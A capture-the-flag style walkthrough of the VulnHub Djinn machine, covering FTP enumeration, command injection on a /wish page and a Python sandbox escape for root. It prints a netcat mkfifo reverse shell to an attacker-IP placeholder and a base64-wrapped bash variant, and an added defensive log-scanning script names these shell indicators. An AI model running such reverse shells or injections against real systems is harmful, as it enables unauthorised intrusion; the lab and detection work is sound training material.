Djinn machine — Walkthrough

Cursemagic
4 min read, Dec 23, 2023


Hi guys, this is the sixth day and sixth box (6D-6B for my personal reference). I will be trying to complete at least one box per day (two or more if I can) so I can gain confidence, learn new things, and prepare for the OSCP.

Wish me luck!

So, today I would like to work on Djinn machine, which is from VulnHub. Let’s get started!

Please read to the end! Thank you!

Enumeration

Nmap

FTP

We can log in to the FTP server and download the files. Conveniently, no user password is needed.

creds.txt

We find a set of credentials in this file.

game.txt

It looks like there is a service on port 1337, and it hosts a game.

message.txt

We might have another username here. It also confirms that things are going to get messy.

Port 7331

The HTTP page on port 7331 shows nothing special.

gobuster

Gobuster finds /wish and /genie. (Wish my dream come true!)

/wish

When I tried to enter ‘whoami’, it showed an error. But the URL still reflects the whoami command, so maybe there is still some hope for our wish.

But when using “../../../../../etc/passwd”, it shows a different output.

After trying for a while, I finally got a reverse shell through the command prompt.

Original: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <Attacker_IP> 4444 >/tmp/f

Base64 encoded: echo <The_Encoded_Original>| base64 -d |bash
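As an added example (not part of the original write-up), here is a small detector that a defender could run over access logs for the /wish endpoint: it flags the traversal string in the query and decodes base64-looking tokens so a wrapped command, like the one above, is inspected in the clear. The log lines are constructed and the parameter name cmd is an assumption, since the post only shows that the URL reflects the submitted command.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample log (CLF). "Y2F0IC9ldGMvcGFzc3dk" is base64 of "cat /etc/passwd".
SAMPLE_LOG = """10.0.0.5 - - [23/Dec/2023:10:00:01 +0000] "GET /wish?cmd=hello HTTP/1.1" 200 512
10.0.0.5 - - [23/Dec/2023:10:00:02 +0000] "GET /wish?cmd=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.0.0.5 - - [23/Dec/2023:10:00:03 +0000] "GET /wish?cmd=echo%20Y2F0IC9ldGMvcGFzc3dk%7Cbase64%20-d%7Cbash HTTP/1.1" 200 640
10.0.0.9 - - [23/Dec/2023:10:00:04 +0000] "GET /genie HTTP/1.1" 200 300"""

# Substrings that have no business in a "wish"; the parameter name 'cmd' is assumed.
SHELL_INDICATORS = re.compile(
    r"mkfifo|/bin/(?:ba)?sh|\bnc\b|base64\s+-d|\.\./|/etc/passwd|\bwhoami\b")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_b64_tokens(text):
    """Decode base64-looking tokens so a wrapped command can be inspected in clear."""
    out = []
    for tok in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error (bad alphabet/padding) is a ValueError
            continue
    return out

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    url = urlparse(target)
    if url.path != "/wish":
        return []
    findings = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already percent-decoded the value
            if SHELL_INDICATORS.search(value):
                findings.append(f"shell indicator in {name}: {value}")
            for plain in decode_b64_tokens(value):
                if SHELL_INDICATORS.search(plain):
                    findings.append(f"base64-wrapped command in {name}: {plain}")
    return findings

def scan_log(log_text):
    """Return (client_ip, finding) pairs for every suspicious /wish request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, _method, target, _status = m.groups()
            alerts.extend((ip, f) for f in inspect_request(target))
    return alerts
```

On the sample log the benign request and the /genie request produce nothing, while the traversal request yields one finding and the base64-wrapped request yields two (the raw pipeline and the decoded command).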

Searching, and wandering around…

The app.py shows this:

Checking the location of creds.txt referenced there, we find a new set of credentials.

So, to switch to the user nitish, we can use su nitish. But first we need to upgrade the shell.

I am Nitish

In nitish’s home directory, we find the user.txt flag.

Next, I check the user’s permissions. We can see /usr/bin/genie listed, which we might be able to use.

So, we could try to ask genie for help?

Let’s try some…

It just got added and nothing changed. I also tried looking for other methods, but they failed as well.

Maybe we should try the math game on port 1337?

Port 1337

Well, you are partially right.

After searching Google for a while, I found this.

Link: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes

I tried one of the techniques here.

After multiple tries, I finally got the reverse connection.

The trailing bash ensures that the command is interpreted by the Bash shell. Without it, the command would be executed by the system’s default shell, which may or may not be Bash.

Then, we have the final proof.

Voila! Another room done!

Thank you for reading my write-up. I would like to improve my write-up skills in the future; you can reach me through Twitter or the comments. Sponsors are also welcome.

Twitter: https://twitter.com/curse_jk

Buy me a coffee: http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com


Written by Cursemagic

Just learning, together we are strong.
